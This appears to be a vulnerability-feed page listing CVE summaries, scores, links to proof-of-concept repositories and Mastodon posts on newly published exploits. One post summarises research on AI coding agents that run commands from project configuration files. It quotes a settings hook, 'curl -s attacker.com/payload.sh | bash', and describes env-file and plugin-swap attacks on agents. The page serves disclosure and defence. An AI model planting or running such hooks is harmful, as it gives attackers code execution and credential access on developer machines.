(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-04-28T18:21:09

1 posts

## Summary Plivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key. ## Impact An attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing.

thehackerwire@mastodon.social at 2026-04-28T22:00:12.000Z ##

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41387
(9.7 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T18:18:46

1 posts

## Summary Host exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior. ## Impact An approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content. ## Affected Component `src/infra/host-env-sec

thehackerwire@mastodon.social at 2026-04-28T22:31:12.000Z ##

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41386
(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:18:23

1 posts

## Summary Bootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing. ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity. ## Affected Packages / Versions

thehackerwire@mastodon.social at 2026-04-28T22:30:45.000Z ##

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41378
(CVSS UNKNOWN)

EPSS: 0.18%

updated 2026-04-28T18:15:32

1 posts

## Summary Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.

thehackerwire@mastodon.social at 2026-04-28T22:31:31.000Z ##

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41602
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T15:31:54

1 posts

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

thehackerwire@mastodon.social at 2026-04-29T01:00:17.000Z ##

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27760
(8.1 HIGH)

EPSS: 0.10%

updated 2026-04-28T15:30:58

1 posts

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that pers

thehackerwire@mastodon.social at 2026-04-29T00:15:45.000Z ##

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5944
(8.2 HIGH)

EPSS: 0.09%

updated 2026-04-28T15:30:52

1 posts

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication. An unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the expo

thehackerwire@mastodon.social at 2026-04-29T00:16:05.000Z ##

🟠 CVE-2026-5944 - High (8.2)

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3323
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-28T12:31:36

1 posts

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

thehackerwire@mastodon.social at 2026-04-29T00:59:57.000Z ##

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35431
(10.0 CRITICAL)

EPSS: 0.09%

updated 2026-04-28T12:10:53.103000

1 posts

Server-side request forgery (SSRF) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.

beyondmachines1@infosec.exchange at 2026-04-28T16:01:29.000Z ##

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-5450
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-23T15:33:34.277000

1 posts

Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.

vitobotta@mastodon.social at 2026-04-28T15:01:12.000Z ##

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

##

CVE-2026-3844
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-04-23T04:00:28

1 posts

The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited

Nuclei template

5 repos

https://github.com/0xgh057r3c0n/CVE-2026-3844

https://github.com/halilkirazkaya/CVE-2026-3844

https://github.com/dinosn/CVE-2026-3844

https://github.com/tausifzaman/CVE-2026-3844

https://github.com/im-hanzou/CVE-2026-3844

CVE-2026-5588
(0 None)

EPSS: 0.01%

updated 2026-04-21T16:16:20.540000

1 posts

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules). This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java. This issue affects BC-JAVA: from 1.67 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147 and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-33626
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-21T15:04:13

1 posts

## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. ## Affected Versions - **Tested on:** main branch (2026-02-04) -

CVE-2026-20147
(9.9 CRITICAL)

EPSS: 0.28%

updated 2026-04-17T15:09:46.880000

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sen

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147 and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-61260
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-16T22:56:43

1 posts

A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2026-34197
(8.8 HIGH)

EPSS: 65.07%

updated 2026-04-16T21:49:17

1 posts

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) a

Nuclei template

9 repos

https://github.com/dinosn/CVE-2026-34197

https://github.com/0xBlackash/CVE-2026-34197

https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE

https://github.com/DEVSECURITYSPRO/CVE-2026-34197

https://github.com/xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-

https://github.com/keraattin/CVE-2026-34197

https://github.com/hg0434hongzh0/CVE-2026-34197

https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197

https://github.com/Catherines77/ActiveMQ-EXPtools

spinscale@mastodon.social at 2026-04-29T12:56:01.000Z ##

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

horizon3.ai/attack-research/di

##

CVE-2026-20148
(4.9 MEDIUM)

EPSS: 0.06%

updated 2026-04-15T18:32:03

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by se

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147 and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-26157
(7.0 HIGH)

EPSS: 0.01%

updated 2026-04-15T00:35:42.020000

1 posts

A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.

exploitdb_bot@mastodon.social at 2026-04-30T08:31:13.000Z ##

🚨 New Exploit: BusyBox 1.37.0 - Path Traversal
📋 CVE: CVE-2026-26157
👤 Author: Calil Khalil

🔗 exploit-db.com/exploits/52538

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26157

##

CVE-2025-46811
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-15T00:35:42.020000

1 posts

A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with the ability to connect to port 443 of SUSE Manager to run any command as root on any client. This issue affects Container suse/manager/5.0/x86_64/server:5.0.5.7.30.1: from ? before 5.0.27-150600.3.33.1; Image SLES15-SP4-Manager-Server-4-3-BYOS: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server

1 repos

https://github.com/b-L-x/CVE-2025-46811

exploitdb_bot@mastodon.social at 2026-04-30T07:21:05.000Z ##

🚨 New Exploit: SUSE Manager 4.3.15 - Code Execution
📋 CVE: CVE-2025-46811
👤 Author: wjmaj98

🔗 exploit-db.com/exploits/52527

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-46811

##

CVE-2026-35414
(4.2 MEDIUM)

EPSS: 0.02%

updated 2026-04-10T19:36:57.163000

1 posts

OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon scenarios involving a principals list in conjunction with a Certificate Authority that makes certain use of comma characters.

2 repos

https://github.com/killercd/CVE-2026-35414

https://github.com/dehobbs/cve_2026_35414

chrispy@chaos.social at 2026-04-28T15:51:14.000Z ##

@kubikpixel The vulnerability was already fixed at the beginning of April with the release of OpenSSH 10.3

Detail Description :
nvd.nist.gov/vuln/detail/CVE-2
(as far as I know, a still-functioning and public-interest service of the government of the United States :awesome: )

##

CVE-2025-8065
(6.5 MEDIUM)

EPSS: 0.08%

updated 2026-04-03T18:31:04

2 posts

A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3. An unauthenticated attacker on the same local network segment can send specially crafted SOAP XML requests, causing memory overflow and device crash, resulting in denial-of-service (DoS).

CVE-2026-25047
(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-02-27T20:45:41

1 posts

### Summary A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8. ### Details The vulnerability resides in the `add()` function and `indexer()` function implemented within `deepHas.js`. Although version 1.0.7 attempts to prevent prototype pollution by checking property

1 repos

https://github.com/mbanyamer/deephas-1.0.7-Prototype-Pollution-PoC-CVE-2026-25047-

exploitdb_bot@mastodon.social at 2026-04-30T07:21:09.000Z ##

🚨 New Exploit: deephas 1.0.7 - Prototype Pollution
📋 CVE: CVE-2026-25047
👤 Author: banyamer

🔗 exploit-db.com/exploits/52528

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25047

##

CVE-2026-26335
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-26T22:45:37.080000

1 posts

Calero VeraSMART versions prior to 2022 R1 use static ASP.NET/IIS machineKey values configured for the VeraSMART web application and stored in C:\\Program Files (x86)\\Veramark\\VeraSMART\\WebRoot\\web.config. An attacker who obtains these keys can craft a valid ASP.NET ViewState payload that passes integrity validation and is accepted by the application, resulting in server-side deserialization a

1 repos

https://github.com/mbanyamer/CVE-2026-26335-Calero-VeraSMART-RCE

exploitdb_bot@mastodon.social at 2026-04-30T09:51:05.000Z ##

🚨 New Exploit: Repetier-Server 1.4.10 - Path Traversal
📋 CVE: CVE-2026-26335
👤 Author: banyamer

🔗 exploit-db.com/exploits/52540

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26335

##

CVE-2025-69985
(9.8 CRITICAL)

EPSS: 0.92%

updated 2026-02-26T19:39:20.677000

1 posts

FUXA 1.2.8 and prior contains an Authentication Bypass vulnerability leading to Remote Code Execution (RCE). The vulnerability exists in the server/api/jwt-helper.js middleware, which improperly trusts the HTTP "Referer" header to validate internal requests. A remote unauthenticated attacker can bypass JWT authentication by spoofing the Referer header to match the server's host. Successful exploit

2 repos

https://github.com/joshuavanderpoll/CVE-2025-69985

https://github.com/tianarsamm/CVE-2025-69985

exploitdb_bot@mastodon.social at 2026-04-30T10:31:05.000Z ##

🚨 New Exploit: FUXA 1.2.8 - Authentication Bypass + RCE Exploit
📋 CVE: CVE-2025-69985
👤 Author: joshua

🔗 exploit-db.com/exploits/52544

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-69985

##

exploitdb_bot@mastodon.social at 2026-04-30T09:51:11.000Z ##

🚨 New Exploit: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap
📋 CVE: CVE-2026-2441
👤 Author: nu11secur1ty

🔗 exploit-db.com/exploits/52542

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-2441

##

CVE-2026-25961
(7.5 HIGH)

EPSS: 0.03%

updated 2026-02-20T20:22:32.817000

1 posts

SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker with any valid TLS certificate (e.g., Let's Encrypt) can intercept the update check request, inject a malicious installer URL, and achieve arbitrary code

1 repos

https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE

exploitdb_bot@mastodon.social at 2026-04-30T08:16:12.000Z ##

🚨 New Exploit: SumatraPDF 3.5.2 - Remote Code Execution
📋 CVE: CVE-2026-25961
👤 Author: banyamer

🔗 exploit-db.com/exploits/52535

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25961

##

CVE-2026-26235
(7.5 HIGH)

EPSS: 0.40%

updated 2026-02-20T19:52:03.777000

1 posts

JUNG Smart Visu Server 1.1.1050 contains a denial of service vulnerability that allows unauthenticated attackers to remotely shutdown or reboot the server. Attackers can send a single POST request to trigger the server reboot without requiring any authentication.

1 repos

https://github.com/mbanyamer/CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

exploitdb_bot@mastodon.social at 2026-04-30T08:31:06.000Z ##

🚨 New Exploit: JUNG Smart Visu Server 1.1.1050 - DoS
📋 CVE: CVE-2026-26235
👤 Author: banyamer

🔗 exploit-db.com/exploits/52536

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26235

##

CVE-2026-24486
(8.6 HIGH)

EPSS: 0.03%

updated 2026-02-17T20:44:50.210000

1 posts

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workar

exploitdb_bot@mastodon.social at 2026-04-30T10:01:06.000Z ##

🚨 New Exploit: Python-Multipart 0.0.22 - Path Traversal
📋 CVE: CVE-2026-24486
👤 Author: jefersoncardoso.dev

🔗 exploit-db.com/exploits/52543

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24486

##

steelefortress at 2026-04-30T11:00:11.778Z ##

CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.

Read more: steelefortress.com/6o7x90

CyberDefense

##

steelefortress@infosec.exchange at 2026-04-30T11:00:11.000Z ##

CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.

Read more: steelefortress.com/6o7x90

CyberDefense #InfoSec #Encryption #DataPrivacy #Privacy

##

CVE-2026-21248
(7.3 HIGH)

EPSS: 0.03%

updated 2026-02-11T20:15:17.870000

1 posts

Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.

exploitdb_bot@mastodon.social at 2026-04-30T08:31:10.000Z ##

🚨 New Exploit: Windows 11 25H2 - Heap Overflow
📋 CVE: CVE-2026-21248
👤 Author: nu11secur1ty

🔗 exploit-db.com/exploits/52537

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-21248

##

CVE-2026-25732
(7.5 HIGH)

EPSS: 0.08%

updated 2026-02-07T00:31:59

1 posts

### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern `UPLOAD_DIR / file.name`. Malicious filenames containing `../` sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deploy

1 repos

https://github.com/mbanyamer/CVE-2026-25732-NiceGUI-3.6.1

exploitdb_bot@mastodon.social at 2026-04-30T08:16:09.000Z ##

🚨 New Exploit: NiceGUI 3.6.1 - Path Traversal
📋 CVE: CVE-2026-25732
👤 Author: banyamer

🔗 exploit-db.com/exploits/52534

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25732

##

CVE-2025-12383
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-05T15:43:37

1 posts

In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignoring of critical SSL configurations - such as mutual authentication, custom key/trust stores, and other security settings. This issue may result in SSLHandshakeException under normal circumstances, but under certain conditions, it could lead to unauthorized trust in insecure servers (see PoC)

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147 and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-25130
(9.7 CRITICAL)

EPSS: 0.04%

updated 2026-01-31T03:53:47

1 posts

## Summary The CAI (Cybersecurity AI) framework contains multiple argument injection vulnerabilities in its function tools. User-controlled input is passed directly to shell commands via `subprocess.Popen()` with `shell=True`, allowing attackers to execute arbitrary commands on the host system. ## Vulnerable Component **Function:** `find_file()` in `src/cai/tools/reconnaissance/filesystem.py`

1 repos

https://github.com/mbanyamer/CVE-2026-25130-Cybersecurity-AI-CAI-Framework-0.5.10

exploitdb_bot@mastodon.social at 2026-04-30T07:31:06.000Z ##

🚨 New Exploit: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection
📋 CVE: CVE-2026-25130
👤 Author: banyamer

🔗 exploit-db.com/exploits/52530

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25130

##

CVE-2025-68705
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-01-07T21:34:38

1 posts

# RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**: - **Severity**: Critical (CVSS estimated 9.9) - **Impact**: Arbitrary File Read/Write - **Component**: `/rustfs/rpc/read_file_stream` endpoint - **Root Cause**: Insufficient path validation in `crates/ecstore/src/disk/local.rs:1791` ### Vulnerable Code ```rust // local.rs:1791 - No path sanitization! let file_path =

1 repos

https://github.com/imjdl/CVE-2025-68705

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for, and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug in the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) Rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2025-68161 (CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-12-19T22:08:03

1 posts

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the [verifyHostName](https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName) configuration attribute or the [log4j2.sslVerifyHostName](https://logging.apache.org/log4j/2.x/manual/systemproperties

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147 and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-48924
(6.5 MEDIUM)

EPSS: 0.04%

